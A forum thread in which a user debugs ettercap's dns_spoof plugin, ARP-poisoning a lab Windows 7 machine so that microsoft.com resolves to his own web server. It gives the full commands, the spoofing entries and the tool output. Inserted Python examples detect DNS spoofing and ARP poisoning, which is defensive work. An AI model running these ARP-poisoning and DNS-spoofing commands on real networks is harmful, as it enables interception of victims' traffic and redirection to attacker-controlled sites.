[ettercap]dns_spoof problem


pierre


hello,

I try to use the plugin dns_spoof on a victim machine.

However, an error appears:

root@osboxes:~# ettercap –i eth0 –T –q –P dns_spoof -M ARP /192.168.0.2.//
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
TARGET (–i) contains invalid chars !

The parameter "-i" requires an interface value, so what's wrong?

PS : I can do the classic MITM with the graphical interface.


The command works with

ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2//

Here is what I've done:

I try to redirect a victim to my own Apache web server when it visits a particular URL.
First I have a look at etter.dns:

root@osboxes:~# vim /etc/ettercap/etter.dns
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com A 192.168.0.1
*.microsoft.com A 192.168.0.1
www.microsoft.com PTR 192.168.0.1 # Wildcards in PTR are not allowed

So the victim is spoofed when going to microsoft.com.
I can ping my victim:

root@osboxes:~# ifconfig eth0 192.168.0.1/24
root@osboxes:~# ping 192.168.0.2
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.
64 bytes from 192.168.0.2: icmp_seq=1 ttl=128 time=0.808 ms
64 bytes from 192.168.0.2: icmp_seq=2 ttl=128 time=0.639 ms
^C
--- 192.168.0.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 0.639/0.723/0.808/0.088 ms

I activate the web server:

root@osboxes:~# service apache2 start

So now I enter this command :

ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2//


ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:
eth0 -> 08:00:27:1D:EC:A2
192.168.0.1/255.255.255.0
fe80::a00:27ff:fe1d:eca2/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 65534 EGID 65534...

33 plugins
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

Scanning for merged targets (1 hosts)...

* |==================================================>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.0.2 08:00:27:3B:98:9D

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

But unfortunately, the victim can access microsoft.com; nothing is spoofed...
PS: My victim has access to my web server by entering the IP address in the URL bar of its browser.

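A defender-side check, added here as an example and not part of the thread: with the etter.dns entries quoted in the post above, a spoofed client would see microsoft.com answered with 192.168.0.1, so a resolver log or a DNS sensor can flag public names that resolve into private address space. The sample answers and the private-suffix list below are constructed for the demonstration.

```python
# Added example (not from the forum thread): flag DNS A answers that map a
# public hostname to a private (RFC 1918), loopback or link-local address,
# which is exactly what the quoted etter.dns rules would produce on a victim.
import ipaddress

# Constructed sample of (qname, answer) pairs as a resolver or sensor would log them.
SAMPLE_ANSWERS = [
    ("www.microsoft.com", "192.168.0.1"),   # what the "*.microsoft.com A" rule yields
    ("microsoft.com", "192.168.0.1"),       # what the "microsoft.com A" rule yields
    ("www.linux.org", "104.18.24.47"),      # constructed public address, not flagged
    ("intranet.local", "192.168.0.10"),     # private name, private address: expected
]

# Name suffixes we expect to resolve privately (constructed); all others are public.
PRIVATE_SUFFIXES = (".local", ".lan", ".home")


def is_private_name(qname):
    """True if the name is one we expect to live in private address space."""
    return qname.lower().endswith(PRIVATE_SUFFIXES)


def suspicious_answers(answers):
    """Return the (qname, ip) pairs where a public name resolves to a
    private, loopback or link-local address; those deserve a closer look."""
    hits = []
    for qname, ip in answers:
        if is_private_name(qname):
            continue
        addr = ipaddress.ip_address(ip)
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            hits.append((qname, ip))
    return hits


if __name__ == "__main__":
    for qname, ip in suspicious_answers(SAMPLE_ANSWERS):
        print(f"suspicious: {qname} -> {ip}")
```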

You went from

/192.168.0.2.//

to

//192.168.0.2//

I believe the extra slash at the beginning is causing ettercap to misinterpret your intentions.

You might want to consider not including the -q (quiet) parameter until things do work.


It still does not work...

Here is my /etc/ettercap/etter.dns configuration:

microsoft.com A 192.168.0.1
*.microsoft.com A 192.168.0.1
www.microsoft.com PTR 192.168.0.1 # Wildcards in PTR are not allowed

I've done this:

root@osboxes:~# ettercap -T -i eth0 -P dns_spoof -M arp /192.168.0.2.//

Thu Dec 24 06:04:37 2015 [797997]
UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50)
............ FHFAEBEECACACACACACACACACACACAAA.. ..

Thu Dec 24 06:04:38 2015 [358326]
UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50)
............ FHFAEBEECACACACACACACACACACACAAA.. ..

Thu Dec 24 06:04:38 2015 [547962]
UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50)
............ FHFAEBEECACACACACACACACACACACAAA.. ..

[same logs..]

But my W7 computer (I turned off all firewalls) isn't redirected to my own Apache server.

When I enter 192.168.0.1 in the URL bar, W7 reaches my Apache server...

What's wrong?


Port 137 is NetBIOS so I don't understand what that has to do with DNS.

You're supposed to provide IP addresses, so I'm thinking the dot at the end of the .2 address is wrong, though I believe that if ettercap encounters such a thing and has issues with it, it should complain about it. Anyways, I would start with removing that dot.

Look at the traffic on the network with Wireshark. Verify that the ARP packets are sent by your machine to the target to tell it it should use your machine for something rather than whatever it's configured to use.

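An added example, not code from the thread or from ettercap: a small ARP-reply monitor that does in Python what the reply above suggests checking by hand in Wireshark. It learns IP-to-MAC bindings from ARP replies and reports an IP whose MAC changes, as well as one MAC claiming several IPs, which is what an "-M arp" session against GROUP 2 ANY looks like on the wire. The reply list is constructed, the gateway MAC is a placeholder, and the other two MACs are taken from the ettercap output earlier in the thread.

```python
# Added example (not from the thread): detect ARP poisoning from a stream of
# ARP replies. Two signals are used: an IP that changes MAC, and one MAC that
# claims several IPs. The replies below are constructed for the demonstration.
from collections import defaultdict

ATTACKER_MAC = "08:00:27:1d:ec:a2"   # eth0 MAC shown in the ettercap output above
VICTIM_MAC = "08:00:27:3b:98:9d"     # victim MAC from the "ARP poisoning victims" line
GATEWAY_MAC = "00:11:22:33:44:55"    # placeholder for the real router's MAC

# Constructed ARP replies as (sender_ip, sender_mac, target_ip).
SAMPLE_REPLIES = [
    ("192.168.0.254", GATEWAY_MAC, "192.168.0.2"),   # genuine reply from the router
    ("192.168.0.2", VICTIM_MAC, "192.168.0.254"),    # genuine reply from the victim
    ("192.168.0.254", ATTACKER_MAC, "192.168.0.2"),  # poisoned: router IP, other MAC
    ("192.168.0.3", ATTACKER_MAC, "192.168.0.2"),    # same MAC now claims another host
]


def analyse_arp(replies, min_ips_per_mac=2):
    """Return human-readable alerts for the given ARP replies."""
    first_mac = {}                   # ip -> MAC first seen for that ip
    ips_by_mac = defaultdict(set)    # mac -> set of IPs it has claimed
    alerts = []
    for ip, mac, target in replies:
        mac = mac.lower()
        ips_by_mac[mac].add(ip)
        if ip in first_mac and first_mac[ip] != mac:
            alerts.append(
                f"{ip} changed from {first_mac[ip]} to {mac} (reply sent to {target})"
            )
        first_mac.setdefault(ip, mac)
    # A single station legitimately answers for one address (or a few with
    # aliases); one MAC speaking for many hosts is the poisoning signature.
    for mac, ips in ips_by_mac.items():
        if len(ips) >= min_ips_per_mac:
            alerts.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for line in analyse_arp(SAMPLE_REPLIES):
        print("ALERT:", line)
```

On a live network the same logic can be fed from a packet capture filtered to ARP opcode 2 (reply); proxy-ARP or HSRP/VRRP routers can trigger the second rule legitimately, so tune the threshold for the segment.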
